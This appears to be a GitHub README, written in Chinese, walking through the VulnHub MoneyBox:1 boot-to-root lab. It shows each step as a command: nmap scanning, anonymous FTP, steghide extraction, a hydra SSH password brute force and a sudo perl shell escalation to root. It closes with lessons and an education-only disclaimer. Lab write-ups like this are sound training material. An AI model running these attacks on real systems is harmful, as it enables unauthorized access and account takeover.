YoganandhaNamana/MoneyBox-CTF-

GitHub: YoganandhaNamana/MoneyBox-CTF-

VulnHub Easy 级 Linux 靶机 MoneyBox:1 的渗透测试全流程实战教程文档,演示从侦察到提权的完整攻击链。

Stars: 0 | Forks: 0

# 💰 MoneyBox: 1 (VulnHub) ![平台](https://img.shields.io/badge/Platform-VulnHub-red) ![难度](https://img.shields.io/badge/Difficulty-Easy-success) ![操作系统](https://img.shields.io/badge/OS-Linux-blue) ![状态](https://img.shields.io/badge/Completed-✔️-brightgreen) ## 📖 概述 MoneyBox:1 是 VulnHub 上的一个 Easy 级别的 Linux Boot-to-Root 靶机,旨在练习以下内容: - 枚举 - FTP 枚举 - 隐写术 - 密码破解 - SSH 访问 - Linux 提权 # 攻击路径 ``` Host Discovery │ ▼ Nmap Enumeration │ ▼ Anonymous FTP Login │ ▼ Download Hidden Image │ ▼ Steghide │ ▼ Extract Hidden Password Hint │ ▼ Hydra Password Attack │ ▼ SSH Login │ ▼ sudo -l │ ▼ Perl Privilege Escalation │ ▼ ROOT ``` # 靶机信息 | 靶机 | MoneyBox:1 | |----------|------------| | 平台 | VulnHub | | 难度 | Easy | | 操作系统 | Linux | | 类别 | Boot2Root | # 使用的工具 - Netdiscover - Nmap - FTP - ExifTool - Steghide - Hydra - SSH - DIRB - Perl # 枚举 ## 主机发现 ``` netdiscover ``` 发现 ``` 192.168.1.7 ``` ip dicover ## 端口扫描 ``` nmap -sC -sV -O 192.168.1.7 ``` 发现 - FTP - SSH - HTTP 有趣的发现 ``` Anonymous FTP Login Allowed ``` nmap scean # FTP 枚举 ``` ftp 192.168.1.7 ``` 登录 ``` Username : anonymous Password : anonymous ``` 已下载 ``` trytofind.jpg ``` ftp # 文件分析 ``` exiftool trytofind.jpg ``` 在元数据中未发现任何有趣的内容。 exiftool # 隐写术 ``` steghide extract -sf trytofind.jpg ``` 已恢复 ``` data.txt ``` 内容揭示了用户 **renu** 的密码提示。 stegheid # 目录枚举 ``` dirb http://192.168.1.7 ``` 有趣的目录 ``` /blogs ``` dirb # 密码攻击 ``` hydra -l renu -P rockyou.txt ssh://192.168.1.7 ``` 成功恢复有效的 SSH 凭据。 hydre # 初始访问 ``` ssh renu@192.168.1.7 ``` 成功获取了一个用户 shell。 捕获了 user flag。 flag 2 # 提权 ``` sudo -l ``` 发现 ``` NOPASSWD: /usr/bin/perl ``` 利用 ``` sudo perl -e 'exec "/bin/bash";' ``` 成功将权限提升至 root。 root # 学到的技能 ✔ 网络枚举 ✔ 服务枚举 ✔ 匿名 FTP 枚举 ✔ 隐写术 ✔ 密码破解 ✔ SSH 身份验证 ✔ Linux 枚举 ✔ Sudo 配置不当 ✔ 权限提升 # MITRE ATT&CK | 阶段 | 技术 | |---------|-----------| | 发现 | 主动扫描 | | 凭据访问 | 密码猜测 | | 初始访问 | 有效账户 | | 权限提升 | 滥用提权控制机制 | # 经验教训 - 匿名 FTP 可能会暴露敏感文件。 - 弱密码很容易被破解。 - 隐写术可以隐藏凭据。 - 配置不当的 sudo 权限会导致 root 权限被接管。 - 最小权限原则至关重要。 # 免责声明 此实战 walkthrough 是在隔离的实验环境中完成的,仅供教育目的使用。 未经授权,请勿在系统上使用这些技术。
标签:CSV导出, CTI, DNS 反向解析, Facebook API, VulnHub, XXE攻击, 内存分配, 协议分析, 权限提升, 网络安全, 隐私保护, 靶机 writeup